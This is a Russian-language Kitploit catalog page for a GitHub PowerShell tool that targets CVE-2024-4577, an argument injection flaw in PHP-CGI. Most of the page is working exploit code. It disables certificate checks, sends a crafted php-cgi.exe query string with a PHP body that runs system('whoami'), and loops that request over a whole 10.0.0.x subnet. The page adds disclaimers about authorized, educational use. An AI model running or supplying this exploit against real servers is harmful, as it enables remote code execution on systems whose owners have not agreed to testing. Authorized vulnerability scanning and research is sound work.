Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4577_PowerShell — 使用PowsrShell掃描CVE-2024-4577 | Kitploit
Инструменты/GitHubGitHub/tntrock/cve-2024-4577_powershell
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubtntrock/cve-2024-4577_powershell

CVE-2024-4577_PowerShell

使用PowsrShell掃描CVE-2024-4577

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-4577_PowerShell

Обратите внимание:
Убедитесь, что у вас есть разрешение на проведение такого тестирования на проникновение в целевой среде. Несанкционированное использование атакующих техник может нарушить законодательство.
Программа предназначена только для образовательных и исследовательских целей. Используйте её в рамках закона и этики.
Если вы не понимаете возможных последствий пентеста, рекомендуется нанять экспертов Red Team для проведения тестирования.

Описание

Сначала отключите проверку сертификатов веб-страниц

root@kitploit:~
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Основная атакующая нагрузка (Payload)

root@kitploit:~
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
$body = "<?php system('whoami'); die(); ?>"

Оборачиваем в функцию и отправляем с помощью встроенного в PowerShell Invoke-WebRequest (можно настроить TimeoutSec)

root@kitploit:~
function Invoke-RequestForIP {
    param (
        [string]$IP,
        [string]$Protocol
    )
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content
    } catch {
        return $_.Exception.Message
    }
}

С помощью цикла сканируем 10.0.0.1 ~ 10.0.0.255

root@kitploit:~
$baseIP = "10.0.0."
$start = 1
$end = 255

for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}

Ссылки

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability
https://nvd.nist.gov/vuln/detail/cve-2024-4577

Скачать инструмент